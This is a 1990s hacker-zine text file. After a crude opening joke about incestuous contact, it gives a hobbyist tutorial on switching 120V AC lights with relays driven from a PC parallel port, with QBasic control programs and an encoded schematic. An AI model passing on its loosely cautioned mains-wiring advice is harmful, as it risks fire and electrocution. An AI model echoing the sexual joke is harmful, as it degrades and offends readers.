\|/ WW WW \|/ \|/ \|/ \|/ \|/ \|/ \|/ \|/ \|/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _______________________________ ____________________ |PHRACK UPDATE#@!%^&^$#@!$#@!@# | n0t3 frUm er1kB?->|Ph1l3 Und3r 31337!@$| |From Phrack 46 Line Noize |___________________|____________________|___ | -=Almozt Buzt3d!@#=- by d34thSt4r . I wUz 1n A M4lL e4t1nG K4ndYb4rZ WifF a B4g FuLl Ov AuT0d34l3rZ TrW L0g1nZ Wh3n A K4r PuLleD Up AnD 1 Sh1t M4h P4nTz 4nD st4rT3d T0 CrY d3n A p3rs0n G0t 0uT 4nD 1 Tr1eD t0 RuN BuT 1'M s0 dUm 4nD PlUs 3y3 h4d sh1t M4h P4nTz S0 3y3 f3Ll d0Wn 4nD Cr13d Ph0r My m0MmY BuT D4h p3rs0n WifF d4h C4r WuZz My M0mM13 s0 1 R4n t0 h3r 4nD sUck3d H3r t1tT13s 4nD d4t 1z h0w 3y3 WuZ Alm0zT BuzTed!@$# -DS . . . d0Wn 1n FrAgGle R0ck! . d0Wn 1n FrAgGle R0ck! BumP BuMp! . . BumP BuMp! \\//////// ==||=||==========================| FEH! |==============================||=||== || || This Was a CAFBL T-Phile X X All Rights Reserved wh00t@! || || ==||=||===========================\ /===============================||=||== Dis wuz 100% On_Craq(tm) File - (O O) - Phear Me! Wh0Rd!#@ I'm On_Craq!#@ ~~~~\ <----------------------------------------------------------------------------> The Hacker Light Show by Tele Monster This was first used publicly @ summercon 1995 ** WARNING - ThIS file deals with high level electricity. If you are not familiar with working with 120volt AC levels, do not attempt to make this device for controlling household electricity. It can be used to safely control 12volt DC lights, or any device as well. The author or FEH takes no responisbility for the loss of life, limb or computer (that includes 8255ppi's and parallel ports). Now that your ready to burn your house or hotel down, lets begin. This system switches up to 8 relays from a printer port. Using the relays described the MAX on each relay is 2 amps of AC power. That equals 200 watts of lights, or 2 lamps with 100 watt bulbs. We solve the load problem with small modules that switch 15 amps worth of power, which is good for 15 100 watt light bulbs. You can use the relays to switch any dc loads instead. Included is some examples of software. The idea came from an article written in computer shopper about running a radio controlled car. I only saw the article once at a friends house and was never able to find it again. I peiced this together, it works for me. ---- PARTS for main controller: * 4 dpdt relays. These need a 5 volt coil, ttl compatible and switch a 120volt AC load @ 2 amps. These can be found at your nearby radio shack. * 4 1N4148 diodes * A sutable housing. Mine was housed in a rack mount 12 outlet box I found at a surplus store. You might want a circuit breaker in there as well. Its easy to take a 6 outlet power strip and remove 2 outlets. * A cable (DB-25) to connect to your parallel port. If you are going to use a serial cable, be sure that all pins are wired. Make sure the gender is proper to (male for most people). * A 5 volt DC power supply. One that is adjustable between 5 and 7 is good. A little plug in power pack works dandy ---- PARTS for remote modules (1 set needed for each module) * 1 Tupperware (tm), Rubermaid (tm), or Rat Shack project box. * 1 Heavy duty 3 conductor extension cord (3 prong, 8' should do fine) * 1 long length (depending on how remote) zip cord & plug. This will determine how far away you can place the module from the controller. This has to be able to handle 120vac, but doesn't have to be thick. Cheap thin lamp cord and a clip on plug do fine. * 1 DPDT (or SPST, I dunnot care) relay. 120volt AC coil with contacts rated at 120 volt ac. 10 to 15 amps is fairly good. Instructions for building main controller: ----------------------------------------- Printer Port Relay .--- AC plug black .-----------------. : .-AC plug white 2 -------+---:- N.O. -: --------:--:------------- Outlet #1 black : :coil load -: --------+ +------------- Outlet #1 white diode ^ .-:- N.C --: : : : : `-----------------' : : +5v----+-' : : Relay : : .-----------------. : : 3 -------+---:- N.O. -: --------:--:------------- Outlet #2 black : :coil load -: --------+ +------------- Outlet #2 white diode ^ .-:- N.C --: : : : : `-----------------' : : +5v----+-' : : Relay : : .-----------------. : : 4 -------+---:- N.O. -: --------:--:------------- Outlet #3 black : :coil load -: --------+ +------------- Outlet #3 white diode ^ .-:- N.C --: : : : : `-----------------' : : +5v----+-' : : Relay : : .-----------------. : : 5 -------+---:- N.O. -: --------:--:------------- Outlet #4 black : :coil load -: --------+ `------------- Outlet #4 white diode ^ .-:- N.C --: : : `-----------------' +5v----+-' +5v -----. : 20 ---- (power supply 5 volts dc -)-:|:|:|--' - + Key --- + = connected, -:- = not connected. N.O = Normally open (when no power going to coil, power doesnt pass thru) N.C = Normally closed. Load = Common Notes ----- On the AC power side, the ground (green) and white should be wired straight down. from the plug from the wall to all outlets. The black wire runs into every relay's load, then from the n.o line into the power outlets. You can put 8 relays per port on this system. Just duplicate the same thing using pins 6 7 8 & 9. You may have to adjust the voltage from the power supply. Trigger all relays on, then check to see if they all open. I WOULD NOT SUGGEST USING THIS WITH A COMPUTER WHO'S PRINTER PORT IS NOT EASILY CHANGEABLE. HENCE A EXPENSIVE NOTEBOOK OR LAPTOP, OR OTHER STRANGE COMPUTERS. BY CHANGEABLE, I MEAN REPACED IN CASE OF ACCIDENT. The BLACK wires go into the ac outlets on the side with the LARGE blade. PLUG .-----black Remote modules: : .---white -------------- : : 15 amp relay : : .----------------. : : OUTLET ac plug/black/2 conductor zip cord) ------- :- no-:--:------- black white ------------- :- coil load :--' `----- white : nc-: `----------------' The ac plug zip cord connects to an outlet on the above controller. The zip cord plug triggers the relay, which allows power to flow between the PLUG/OUTLET. Be sure to solder the connections VERY WELL. I used non-conductive hot melt glue all over the solder connections to help prevent any shorting. Software -------- The way the unit is programmed, or rather the way it works is as follows. Whenever data is sent thru the printer port, the 8 data lines make and break connections. This unit just puts 8 relays on it, and you force the printer port to hold values. Here is a basic program that will count binarily up. If you have 8 relays hooked up, you will see it count in binary. 10 CLS 20 PRINT "FEH 1995 PUNK ASS BEYATCH" 30 C = 0 40 D = 0 50 OUT &378, C 55 PRINT "werd. ",C 60 D = D + 1 70 IF D = 2000 GOTO 100 80 GOTO 60 100 C = C + 1 110 GOTO 40 the command to output the value is OUT &378, # # range is 0 to 255. replace 378 with the proper port address. 255 resets. duh In C use the outport command. Turbo Pascal, hellifIknow. --------------------------------------------------------------- Welp- Have fun... And after and if it works - I will release the 128 port non-electromechanical version. Hopefully you will see it in action @ h0h0con. I hope everyone will help in connecting up a huge 5 x 6 room matrix. :) Please bring all the extension cords you can! Also - We have been sucessful in using DPDT relays to construct, well, a pretty downright simple conference bridge by connecting phone lines and a dtmf decoder. This should crank forth some ideas. Enclosed could be some sample source, including FLASH.BAS used @ scon, and a gif of the schematic. Laters all- Tele Monster / telmnstr@infi.net 10 CLS : R=0 20 LOCATE 11,30 : PRINT "The Multi-Media Group 1993" 30 R=R+1 : IF R=3000 THEN GOTO 50 40 GOTO 30 50 CLS 60 F=1 70 PRINT "--Flasher-Tracker-V.2.0-----------------------------------------" 80 PRINT "Written By Tele Monster - The Multi-Media Group 1993" 90 PRINT "----------------------------------------------------------------" 100 PRINT "Rate per step ? (200 = normal): 110 INPUT D 120 CLS 130 LOCATE 3,3 : PRINT "Rate is set to.. ";D 140 C=1 : OUT &H378, 254 : PRINT " º=STEP 1=º========º========º========º","RATE:";D : E=E+1 150 IF C=D GOTO 290 160 IF INKEY$="-" THEN GOSUB 1060 170 IF INKEY$="+" THEN GOSUB 1070 180 IF INKEY$="Q" THEN GOSUB 1090 190 IF INKEY$="W" THEN GOSUB 1100 200 IF INKEY$="E" THEN GOSUB 1110 210 IF INKEY$="R" THEN GOSUB 1120 220 IF INKEY$="T" THEN GOSUB 1130 230 IF INKEY$="Y" THEN GOSUB 1140 240 IF INKEY$="U" THEN GOSUB 1150 250 IF INKEY$="I" THEN GOSUB 1160 260 IF INKEY$="O" THEN GOSUB 1170 270 C=C+1 280 GOTO 150 290 C=1 : OUT &H378, 253 : PRINT " º--------º=STEP 2=º--------º--------º" 300 IF C=D GOTO 440 310 IF INKEY$="-" THEN GOSUB 1060 320 IF INKEY$="+" THEN GOSUB 1070 330 IF INKEY$="Q" THEN GOSUB 1090 340 IF INKEY$="W" THEN GOSUB 1100 350 IF INKEY$="E" THEN GOSUB 1110 360 IF INKEY$="R" THEN GOSUB 1120 370 IF INKEY$="T" THEN GOSUB 1130 380 IF INKEY$="Y" THEN GOSUB 1140 390 IF INKEY$="U" THEN GOSUB 1150 400 IF INKEY$="I" THEN GOSUB 1160 410 IF INKEY$="O" THEN GOSUB 1170 420 C=C+1 430 GOTO 300 440 C=1 : OUT &H378, 251 : PRINT " º--------º--------º=STEP 3=º--------º" 450 IF C=D GOTO 590 460 IF INKEY$="-" THEN GOSUB 1060 470 IF INKEY$="+" THEN GOSUB 1070 480 IF INKEY$="Q" THEN GOSUB 1090 490 IF INKEY$="W" THEN GOSUB 1100 500 IF INKEY$="E" THEN GOSUB 1110 510 IF INKEY$="R" THEN GOSUB 1120 520 IF INKEY$="T" THEN GOSUB 1130 530 IF INKEY$="Y" THEN GOSUB 1140 540 IF INKEY$="U" THEN GOSUB 1150 550 IF INKEY$="I" THEN GOSUB 1160 560 IF INKEY$="O" THEN GOSUB 1170 570 C=C+1 580 GOTO 450 590 C=1 : OUT &H378, 247 : PRINT " º--------º--------º--------º=STEP 4=º", "Count:";F : F=F+1 600 IF C=D+3 GOTO 740 610 IF INKEY$="-" THEN GOSUB 1060 620 IF INKEY$="+" THEN GOSUB 1070 630 IF INKEY$="Q" THEN GOSUB 1100 640 IF INKEY$="W" THEN GOSUB 1100 650 IF INKEY$="E" THEN GOSUB 1110 660 IF INKEY$="R" THEN GOSUB 1120 670 IF INKEY$="T" THEN GOSUB 1130 680 IF INKEY$="Y" THEN GOSUB 1140 690 IF INKEY$="U" THEN GOSUB 1150 700 IF INKEY$="I" THEN GOSUB 1160 710 IF INKEY$="O" THEN GOSUB 1170 720 C=C+1 730 GOTO 600 740 C=1 : OUT &H378, 251 : PRINT " º--------º--------º=STEP 5=º--------º" 750 IF C=D GOTO 890 760 IF INKEY$="-" THEN GOSUB 1060 770 IF INKEY$="+" THEN GOSUB 1070 780 IF INKEY$="Q" THEN GOSUB 1090 790 IF INKEY$="W" THEN GOSUB 1100 800 IF INKEY$="E" THEN GOSUB 1110 810 IF INKEY$="R" THEN GOSUB 1120 820 IF INKEY$="T" THEN GOSUB 1130 830 IF INKEY$="Y" THEN GOSUB 1140 840 IF INKEY$="U" THEN GOSUB 1150 850 IF INKEY$="I" THEN GOSUB 1160 860 IF INKEY$="O" THEN GOSUB 1170 870 C=C+1 880 GOTO 750 890 C=1 : OUT &H378, 253 : PRINT " º--------º=STEP 6=º--------º--------º" 900 IF C=D THEN GOTO 140 910 IF INKEY$="-" THEN GOSUB 1060 920 IF INKEY$="+" THEN GOSUB 1070 930 IF INKEY$="Q" THEN GOSUB 1090 940 IF INKEY$="W" THEN GOSUB 1100 950 IF INKEY$="E" THEN GOSUB 1110 960 IF INKEY$="R" THEN GOSUB 1120 970 IF INKEY$="T" THEN GOSUB 1130 980 IF INKEY$="Y" THEN GOSUB 1140 990 IF INKEY$="U" THEN GOSUB 1150 1000 IF INKEY$="I" THEN GOSUB 1160 1010 IF INKEY$="O" THEN GOSUB 1170 1020 C=C+1 1030 GOTO 900 1040 PRINT " ÇÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÍ͹","Rate:";D 1050 RETURN 1060 D = D + 5 : RETURN 1070 D = D - 5 : RETURN 1080 E=0 : CLS : RETURN 1090 D = 10 : RETURN 1100 D = 20 : RETURN 1110 D = 30 : RETURN 1120 D = 40 : RETURN 1130 D = 50 : RETURN 1140 D = 100 : RETURN 1150 D = 200 : RETURN 1160 D = 300 : RETURN 1170 D = 490 : RETURN 10 CLS 11 PRINT : PRINT : PRINT 20 OPEN "com2" FOR OUTPUT AS 1 30 OPEN "log" FOR OUTPUT AS 2 : PRINT "Actions being saved in file LOG. " 34 LOCATE 4,1 35 PRINT "--------------------------------------------------------------" 40 PRINT "System started at",TIME$, "on", DATE$ 41 PRINT "Using COM 2 for monitor port" 42 PRINT "Resetting Controler" : OUT &H378,255 48 PRINT "--------------------------------------------------------------" 50 PRINT #1, "System started at",TIME$, "on", DATE$ : PRINT #1, CHR$(7) 60 PRINT #2, "System started at",TIME$, "on", DATE$ 100 PRINT #1,".--------------------------------------------." 110 PRINT #1,"| The most advanced light timer.. ever |" 120 PRINT #1,"`--------------------------------------------'" 130 PRINT #1,".--------------------------------------------." 140 PRINT #1,"| Written by Tele Monster November 1993 |" 150 PRINT #1,"`--------------------------------------------'" 160 PRINT #1,".--------------------------------------------." 170 PRINT #1,"| Version 1 . 0 |" 180 PRINT #1,"`--------------------------------------------'" 190 PRINT #1,"-------------------------------------------------" 195 PRINT #1, "- Press + for force on, - for force off" 200 LOCATE 1,1 : PRINT "The Most Advanced Light Timer. EVER. V.1.0 - November 1993 - Tele Monster " : LOCATE 12,1 400 C = 0 410 C = C + 1 411 B$=INKEY$ 412 IF B$="+" THEN OUT &H378, 240 413 IF B$="-" THEN OUT &H378, 255 420 IF C = 2000 THEN GOTO 800 430 IF TIME$ = "17:00:00" THEN GOTO 1000 440 LOCATE 2,5 : PRINT "Time=:",TIME$, "Waiting for 17:00:00" : LOCATE 3,5 : PRINT C 450 GOTO 410 800 A = A + 1 : IF A > 8 THEN GOTO 900 810 IF A = 1 THEN PRINT #1, "C'mon... Its almost midnight... ",TIME$ 820 IF A = 2 THEN PRINT #1, "Its almost twilight on this fine nite.. its",TIME$ 830 IF A = 3 THEN PRINT #1, "Hmmmm. Can't wait till tonight..its ",TIME$ 840 IF A = 4 THEN PRINT #1, "Wouldnt a normal time be easier? ",TIME$ 850 IF A = 5 THEN PRINT #1, "This is a boring job........... ",TIME$ 860 IF A = 6 THEN PRINT #1, "All this to turn on lights..... ",TIME$ 870 IF A = 7 THEN PRINT #1, "Nighttime aproaces on this day..... ",TIME$ 880 IF A = 8 THEN PRINT #1, "Yawn... This gets old fast!!....... ",TIME$ 890 GOTO 400 900 A = 0 : GOTO 800 1000 : LOCATE 12,1 : PRINT "Sending ON command for channels 1,2,3,4" 1010 PRINT #1,"Sending ON command for channels 1,2,3,4" : PRINT #1,CHR$(7) 1011 PRINT #1, ".----------------------------." 1012 PRINT #1, "| . . . .| . . |" 1013 PRINT #1, "| . /\ . . -*- . |" 1014 PRINT #1, "| . /. o \ . |. . |" 1015 PRINT #1, "| /_ o . _\ |" 1016 PRINT #1, "| /o.. o\ |" 1017 PRINT #1, "| /___ . ___\ |" 1018 PRINT #1, "| |__| |" 1019 PRINT #1, "`----------------------------'" 1020 PRINT #2,"Sending ON command for channels 1,2,3,4" 1030 OUT &H378, 240 1040 PRINT "Command Sent" 1050 C = 0 1100 PRINT #1, "Waiting for 23:00:00" 1101 PRINT #2, "Waiting for 23:00:00" 1102 PRINT "Waiting for 23:00:00" 1103 PRINT #1, "Press + for force on, - for force off" 1110 IF TIME$ = "23:00:00" THEN GOTO 2000 1111 LOCATE 2,5 : PRINT "Time:",TIME$, "Waiting for 23:00:00 For Shutdown" 1112 B$=INKEY$ 1113 IF B$="+" THEN OUT &H378, 240 1114 IF B$="-" THEN OUT &H378, 255 1120 GOTO 1110 2000 LOCATE 12,1 : PRINT "Its time to shutdown...." 2001 PRINT #1,"Its time to shutdown...." 2002 PRINT #2,"Its time to shutdown...." 2010 OUT &H378, 255 2020 PRINT #2, "System Reset.... " 2030 PRINT #1, "System going down for nightly event...." 2040 PRINT "System going down for nightly event...." 2050 CLOSE #1 2060 CLOSE #2 2070 GOTO 10 3000 OUT &H378,255 3010 GOTO 412 3050 OUT &H378,240 3060 GOTO 412 [Ed note: I really don't like sticking in binaries, but it is appropriate for this article.] begin 644 lights.gif M1TE&.#=A@`+@`?,`````````J@"J``"JJJH``*H`JJI5`*JJJE555555_U7_ M557___]55?]5____5?___RP`````@`+@`0`$_Q#(2:N]..O-N_]@*(YD:9YH MJJYLZ[YP+,_:8]]XKN]\[__`H'!(+!J/R*1RR6PZG]"H=$JM6J_8K';+[7J_ MX+!X3"Z;S^BT>LUNN]_PN'Q.K]OO^+Q^S^_[_X"!@H.$A8:'B(F*BXR-CH^0 MD9*3E)66EYB9FINA*IT!Q`OTYB\W&8TQO9;V:DRA4B5^A8IW* MDJS+J#V99A.:UJM8(5S[F1QJSJ=:DFR5FCVZ=UC2LEO?CDS[5"I:BE3YIKE* MU_#8JEG3N25<%'#?4W?;BFTL&"Q>FIXU.X8K6)OANN@EQY[R15[X< MTK-TS+8WO@V=/3D5W<[0<\V8M\WU[X@C%Q%_'/80QLSG0]RN];O"\@>^E,II=Z@$XG&L3A@,?< M;@:F6%.)$GX837D&7DB7BN9%).*+)^IUHQ7J44>1A1XJN"$88'7XBI'R=15B M>*H=.1&)-B[%'G#$H0A%A#IB-""2)G+HUWT'SM9A=QCN-J020':96X-!UKA& MD3DNQ*672E+6I'UR/@FB9G%.^6&56.KG8BY_'>'GEOS-5:=V5N[DVT"(,I$F MG6O:&69Z9Q*IRUS/:>D/FJ\QRN9^J77F2V+T7/<>J89FBI*CK7:PIX`5;HK1 MF#VQ)506DT)G%FOYR'%J/D`.VZ)HY[X66,]MKJX( M*[7.Q@G$M.1\R6FX#(WKH$[NV@-LO7'`F>R<^0*\;$+F#D4KF^L([&^B,.*J M;L@@%@JQFR#K>R)],C*W<+E"-C1RN]9ZRFZ-^$XCK%<4!]-SRA;O9RQW&\_+ M9[+_1:ONQ;%B6_.]#+4Y<*9,I\S:RPR7N2N\5BHK*W(YV[SSTE1?ZK3'LWZ< M))AWLCTORFN#RW6+)LLK=7Q-HYM@L4'J.G/(RJ*=;Z52!_I%H(B;/=C96Y-< MYXANXZAJO]=:1_DX=>.Y+?_<>^KM:Z-:!NOI$RR3S'+AB@.-1N)DM[RXH#'_ M;''M271^8[^-\# M?[ZV]W.?ONI3,QK>!J>T+?G/A^(,./^\KDAN?!3F7UBYS] M]!>E_#5/9=KK7W.Z!T$/\-L(,M_%?HF/2G'G&H?`7)7.W^ARH@'M&&$Y1A&7!X M%OC_D-"(*$,A$A\D'RTN\8I/HZ+J,G:PS$%1=M(YG;ZZ!KJ*?=%CR;MB7+(H M/#.$T&:?@M07_W@M%HHC8(6TU1\!54<&WA&0%QM:(C]BO-;PCU229*#..!4A M.5K#(=JSQ2)Y%[-&J;I7GF;UKVZ] M0EUID;7"SO5/4VVK8JTGUL+:]:;542EG8N=8D^9J+8,U(%ZURA*BDA6=PHQ* M9PV8V.CHM5J/%2U/B]'!R]I46IL=RYJB-%OPU-:VKF6M3B]$UL:^H:2^#>YG M>AM$X<:6L4DEDU7YREG:8FJM*/_1:W"7NZ()29>;SWV,=+7+5M,R][K*C)1= MLRM;7$9UN,BM6UW$I9R^IC2WM_4N>8?'V_1NE[H5W&Q]S\OY;XVK@Q387MQ-.;VLWK.!7`1.O\2WO?$7< M7;E:E5F7Y0=,G:=?2]J.KZA,;D5DUL6];L.R*N0N8[>+XS%Z`ZWM129W;SSC M7I9VM6>N0;9Q>%'W2B8S7Q^=:=W#.D%<_K4-T2T2RUYV#L7V;.:U#"P91RM/*/H MT^4RV(4+;.LZ0Y;8\B3Q4(>Z[,H]&[2#MO[WOC.M[[WS>]^^_O?``^XP`=.\(+O@08( M3[C"%\[PACO\X1"/N,0G3O&*6_SB&,^XQC?.\8Y[_.,@'X'!1T[RDIO\Y"A/ MN^B'.5['#SIKK6Z3GN,6NAW5L/NR:Z[NQQB?WL5<^L M:C%WKBU#^\&$$E--7@QVM-L=?IHNXF`%?.3[2@[3T2WQW03GJZJ MR]M:0Q/^\7]`-GH/(V"!^/K+B\8UY#>_,\S[G<>`GW6-1WSXNG/^]`K+>X29 M'/IJ^^C3&8[TR$.><-0'%=W39GQ'0+]VUV-%[FQFIT6S?G#;C\0/IC`!B`03=9DY<[ M%J8&[@<'#XB`_^9FC?=9WW<;!RB!/E=HGG9N%92!7$=[,8:`HZ)@>V=_X%<) M$=@'*XB!&IAKOP6"H-""5Q)Y(KA/%W=_*HA/-$@ZR(8"$#_&#I?`F0IA/2OB$T">#GQ"%UL&$O]>$NJ547!@46MB%7^B%K.4PF[`9 M?F2$DV"%=:"&J?"#Z,9V:B=_N#>'<$B'(9+:2#>SHB,;5H6H;XB=$(BHNXB1KAA-P0C.F0BM?X MC&B"BF?X3*3F?%I%@:.8A&6'=;1(B@ZH#>?!C5/HC6THC"GX=0%T;B?%:N*% MA;'4<$[2C8OACORR*L2X?:RXC>%(!`*PD`S9D`[YD`(```[9:8<'9ZTV,#9( M>_6X.@+)$QF$D0")CI("CALI!`(PCZ[F=K=D4G"!"I)D;S6"RZ)C3))9SQ2D&MXD/"8DT-PDB3)DP1^N6`1,B9,S ME5,4XS=#67-FN85H^8_V6)/%V)8T69)!$)<(:9/K)Y1[Z77OZ)<&>9.%J90F MZ95'>7-Y299G291JR9B3>85RJ9D^0)A)V9B'N45,$Y:+&8^8^(V=B9I=V92B MB9<.Z"!WR2MK*2R`"919V#V!7J MN6D!R6+B,8XA=9GFEXFW"9*">0/DF0/FZ?^<+P)\E=9CU,$SZ$8H>F9^8D#^XF;!`)[F@9>@M>=L=E;_8=<80)KJM>A M5^E'H"1ZL:*-[)B:DLF?%,H#%VJ?3HEF`8J+B9>8O[5@(9I?$FJ=D#F>,OJB17=5@6)8K(EI*YJAX[%>9W6F: M:4FC__>=JXFA38J?3PJ>H]>AED4ALFBEG3=F"'*(6`I@CB>D@F45RKF.0PJA M$%B?+"J=:WJF9:&AU86HY+*&>=JFZ6)_AO>47\JGLXF"->B9;+FDYYFF-E"A M-S"C@YI#_JFGUR;_FP/JDWQW9>9BH'>:?F`Z0MMYFBWZG*H9G=BT`I6JIM0) MI>F(J;\AA:O7;*2:=WG5@$6)F'ZZG*':IV7JHFR*IGJ9F7RIFX5JJ\KJJ]D9 M;E$$:]K:>PI82MY)E3HJG]2"I*_HK(8:JG/H`I;9')YJ`Z`JIRH*J#NZGJ1A MKQ^(K##9JS\"K?-IIM;JKWKH2C5@)SWPK@\0K\RZF4F8C_@ZIOHJGN1JJ1ZY MK.=*J[RJKA[:+M!@L#R`L`J;JYDZFN(ZK?,JKPN;I``[H3`ZL!#;62+[`""; ML8&*G!$;K2[HKRJ+K@%+IJ)XKW+AL3LPL\]ZG$:[J>W)FAP9LX*:K`X*_Z9( M>Q,JL+&62E@R>0$!4'M'6[-,ZK/'JK1O.:Z7JK-?-XE@>[%CR)[]*4E$FZY< M&Z%=:[$H:Z[AFK0F6TAY$W(\NZ!-2%>:Y;+[ZJ2[6K1P6[AT*[9RZ[5H&[9W MVZSF9[:S^J]"Z+>R(+0ZT+8]:[@QR+(IF[B>^Z[B@.[EN(RN6 M2ZV#Z[:;N[5DR[2R.[=UN[2(.[%-0:_Y&KEY"`/M>K#5RKFPN[M12[N=&[NC MBZ*KV[BYBZUO*[FX&U0QB[F5*(E9*;RW>[R*6[L,.AR?*[W.^[J..TDL,+W! M>V]F%K?;N[ZT*3T6E[P[B['Q2ZBMFV_I6[S?._^[>PJ=L>B]][FXKPF]]%N> M_':_IIN]^7NBM;J,R\N[\_N79^O`G7J^]F;`R*N_&*S`--N\G,J]`?S`$2RS M%%QO%LR^"&R\[;O`"F.)X4N\`ARC]8MO)9S`T4O#TKK!!U6Z!_RU'4R]Z)NY MS*N]-LS!.&Q0.GS!^_N_(AS#/XR]09S!3WRZ15Q01VS"/#S`^EG`0.RT*-S% M23S%!%7%0SRV/3S"]#;#7LS%5GS%KIO#2BK!*_D_[FK&<,"0B8#&0GS">?S% MA)M08IS&LCJ7,M6S/DP'"WG'6QRX:ZS';)S(Z_+'^'N]<*S(@$S)2TS`>7#( MB(#'4(RSD0R_3DR:@@#_R9V&\\OJC4)FM'\S+#LSJ^\S+BL MOM;LR3OO'QW!KS&#`1`[<=\C,0OK+:3O;V5_6Z9 M+=";',K<*%.1X2.\Z2+-FF?+S&'03*_;')C=MEJ-0;IZG< M6$?`_=JAF\)DW=P#'=>ZV=WX.9W*;=OXZG@B(W?,!W:SF>&8_W@MPK>")??=3W5N\W%!![? MMBW?]"VS#![B).[=5.S@&@[9="/$QXC:JOV\2@BKXFV^[-W>(N[A[[W@.=ZI M^5F<#Z78$Q[.C?W$+;[AH.S",1[D&&[)QMV;/&[@.L[C.R[E%`7DSLVX,T[A MZJWE'@WCOEI3C`/7(@T$(%[B42[B.W[@4\Y05E[*0@[=Z5V]]]S;L)WBG!WG M>$[8/;WF9C[E)=[C3O[C*"[8$-ZT>XU:0V*%'*VE(;SDCL[A>_YR;=[1YPW$ M#?RPB_W<@)WD5S?(PIO=+3?_Z:E=YUD>T.QGYW2.K)R^WX]4U1;*YZ0^ MY-@\J>8-F:M>QC5>EH/.T:/NN6+:Y=1=Z(0N[!Q5G[0M&_!2Y;T>S*7^NP`= M[<2>ZY6([)%N948U4;'^Z,1.ZY9\ZL5^PUM+[8]C[;O.K4`%[F/7[-5LZ;$J M[E(MON&.UZEK[F,>66YW;#-!L0&U[5QNM\\>[-<=[TC>PDG$J\;]8HG'?\)J MQ.R^MVY[Z7[7#^[>['B/#NY8V>3.GCZI\* MM%ZJ#X#%\?^\V##_[X`DN\EGM;>NBA9O0AM$V=?>>J:6$NI^A`\?\V#FQ4`& M&L$=_\X[/^JI_:1/4TRSO.=GNG@6]WSKNE7_^@J M#Z^PCO^?FS'?HL9_F![\^"VCOH/ M/_V/#^EC+^G8#]C:;Y6N!/TE+^_%'_Y,OOLJU_O.?O[O+O_\<"_[[4_OXH_\ M)+OECB_[$/#DI-5.<+'F_69O"T=2`TLT14^)5=_*%>$OE*=`$VB^]W]@\'?S M$$=&8=*"?"&9O>=,60)4I]>'*XHE;JDV3NZRPY;-9W3**U6GR^MC!]XFS9-5 MO-NGU2\Y=I,X#3$+LKY#Q$2:.<`LQ:#&P#\3O#R52LQ,S4W.3D_.1SJV/J/( M&,$+P@K#T%;71\;%5QY3OTG76JC*63"*7%G)(50+50I67N1DI5B87]@[N5?G M12OEX);G6ZBZ,!WK;W#:2^#P(B'+FFBTZ>9RVU$])E,OH^*)8_=\?6S1\?WT M(;L`7GO3BMVZ4XJ>-%I3S]L_B.[_F#6)Z*O:'H'O"'(Q")&/PF%?5G0;4]&D MM8G^*GYBV=+E13,'5>K[F&@+G)05[$G`=])GMI'M3J+#6$I:QW\U$=&#^:$I MMT$/?TX%*I*B3YG:0F4-ND_I(4:=Q$4M2=7LTIG]5L8[NM5C0INS')8]6S=- MSJXFN3I]V;VSMFZA0^TG9GW M\-`2!8.=/'H5AX<6\&/Q@[/]]'GL98WZOP M]_+"Q4\G_Q^?;?7>YLW=WO^>M'WYC*/O.)3:&XI`1ZY3ASJM@(,/P-7F"ZD^ M<`Q4#3\,_-)P0PV7Z\^[_R"D34+W+JRP-FA[#D1:R/QP]S6L8(H M3"RR"$<6+!3M/,"($ZI$!T.,L;096:S11A"JN>C)$Z#,4$>4$/Q1.O2$S+)! M"G9ZH*NJ`DU`25W+54:JM-EL9)S^!P M7>Z2X[1;7`UT-M0`ZB6WW*FL'55%=?MD-$@WX5W4CH52J==>&/&U2U]=59U" MVWWOPS:]?3,X^&*,,]9X8XX/=E3A?,\5U^$5?(2XX10GUB]BD=(H95V MZ.@8^BF7','-%5VP=596:K&E+GA/":[&&CFM9PY(GK`]';EL6I&GRS$?L;LE/4/\DJX[!UUQ:$>O^?::[8E<]=6'W/RTN?^\ M6=.O$:*]^*F+,)GXB'=ZG/?>#?W=]7AU^=QXQ^R>O>1VI2\R8>B19#U=ZH%E MWO.=JQ2=N=_&%3K\A<18#D\R"T#%C"#8Y- M@7=C6@=]]SUCA#!P*`P=K0X'JOLQ3GVU8U\+"7>Z>\C0,B.D()P4>$+ZQ:2& MR%N@[=(&0B%N_XV&QP,>LS#(P@3R\(IR$,L+'QC#*)YJBEE$'[B0R,$S5E&% M6FPB7Y0GH?^%481CY-8/\7:KA]UH4QEZ$:34HYM)F-^09 M*QO(QO/U[V0G.V8C/ZFW1#8*@LH<8#5G>LD+V-J\Y38]!38PC?HOF1TE)CT/ M:L/&,>29&GQ8.3&*TL:%+6C;9*E-W>E1.QK.@(A\73W)>-'LY!.0-\#8^WJ* MT*KY-*3J^2?5O.H:K1J^8H*&8+*$JJN_"@\FLI3 ML&)5K"\M8R+-:LQ5`7-%:YWD*(&&,+C&-7]5;29,[4I'0D72$V/-:EFKR5!^ M"E:J$"UL71,:3P;Z!2PS;5]C:37M7M-I2X;N MKK1R/6UKSZ7:T!J4MJZ]G>,L]UO@!G>VNXW_)6-]*-1A]I"N-SV<+RL*HGND M;KAAK:UQT:A0QUH6E)TUZ:)61ZBB)RV+6E?36?*AHZ7 MN5$]D6(UFT+E$K>]L.0B'%F M"48PP!1LT0_>Z\$Z_&EEU0IA!"[7LQAV\(8Y/%?]GL.^2W,7=2E\X@Q_U<2Z M=6F*X8?;XL(XOY6,[(PMW&'4AA#'!L;PCOD66!^W,<->"HCG-5:XQ M7Z/H9DT6BZ@,DO.<_T-L91'?&7`-L1!G<_=?/[N&L%EN\Z#7'"4^(SK1$FTK M4"^)9Y`ZMD?;ZO.DH5%I#[,FK=PMU[^F\UP8QM?36U[SE:6!:5";BI.+OJ6D M5ZU=%-O9D;"F-9[@ANOFV?K6<+:EJ^]P(S0)*MG$4M2(\85-EGT77)T>-K"+ M'6A_X;!5V\94L[M;ZI$IU6S[['*UZ=QJ;*]J"3WJ]KK7A&E>AQH>XM8?9,MM M[C_7F;R46G?4%)DW9H_ZTUC#[K_EN5%AXQO0V64R)"KU+44>2^`#'UK!\7BM M7_L'R0HG*[H;ODC[X9';F8)UO"?;K)1..^$G^86?S?\L MB^=65#M=)\LAH4I=#X77)C&U7>8EU'FQ1:Y5Q8'0%>M?G6> M]WCI02UOT">,5E/K>.I63*W!LG[OK3/=XUY7])_ 